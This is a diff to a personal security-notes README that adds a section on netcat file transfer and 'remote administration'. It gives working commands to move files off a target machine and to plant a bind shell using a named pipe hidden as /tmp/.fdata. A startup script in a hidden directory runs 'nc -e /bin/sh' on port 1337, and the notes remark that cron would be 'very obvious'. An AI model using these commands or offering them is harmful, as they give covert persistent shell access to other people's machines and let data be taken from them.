Kiljan/Sec/README.md

 |---|---|
 |sipcalc 172.16.0.0/12|    for checking a network|
 |sipcalc 172.16.0.0/12 -s 16|  for devide network on 16 subnets; -s > /12 on that example|

+### NETCAT FILE TRANSFER AND REMOTE ADMINISTRATION

+1. Connecting to a TCP/UDP Port
+1. Transferring Files with Netcat
+   1. Create a listener on my machine and pipe the traffic from the input into a file

+        ```bash
+        nc -lvvp 4444 > file_to_download.txt

+        -l = listening
+        -vv = Show extra verbosity
+        -p = port for listening
+        ```

+   1. Back on the ssh session on the target machine we are going to transfer the file through netcat to the listening port on our local machine

+        ```bash
+        nc -nvv 192.168.1.141 4444 < file_to_download.txt

+        -n == do not resolve IP address using DNS
+        ```

+   1. netcat will not tell once the file has finished transferring.
+It is a good idea to open another shell and do __ls -ls fileToTransfer.csv.enc__ to check when the file has stopped increasing in size.

+1. Transfer a whole directory (including its content) from one host to another
+   1. On the sender side run first:

+        ```bash
+        tar cfvz - folderToPass/ | nc -lp 10000
+        ```

+   1. Second.
+On the client side run:

+        ```bash
+        nc [sender ip] 10000 | tar xfvz -
+        ```

+   1. No info will be printed.
+But I can check in Wireshark my connection.
+When I got [PSH, ACK] then I can terminate sending file from sender machine

+1. Remote Administration with Netcat (Ubuntu Server 18.04)

+   1. I don't know how to automate it yet but i can create a reverse shell on a target machine.
+  Unfortunately netcat option __-e__ is discarded but with a Ubuntu Server 18.04 I can do something like this:

+   1. Server listning and provide a shell (I can use cron but it is veary obvious)

+        ```sh
+        #!/bin/sh
+        rm -f /tmp/.fdata && mkfifo /tmp/.fdata && cat /tmp/.fdata | /bin/bash -i 2>&1 | nc -l [host] [port] > /tmp/.fdata
+        ```

+   1. From attacking perspective

+        ```bash
+        nc [host] [port]
+        ```

+   1. PS Old way working on linux was simple script run from __rc__ directory:

+        ```sh
+        #!/bin/sh

+        #save in /etc/rc.d/rc.ftpp
+        mkdir -p /etc/ftp/.data
+        while true ; do
+        cd /etc/ftp/.data | nc -l -p 1337 -e /bin/sh
+        done
+        ```

 ### DHCP ISSUES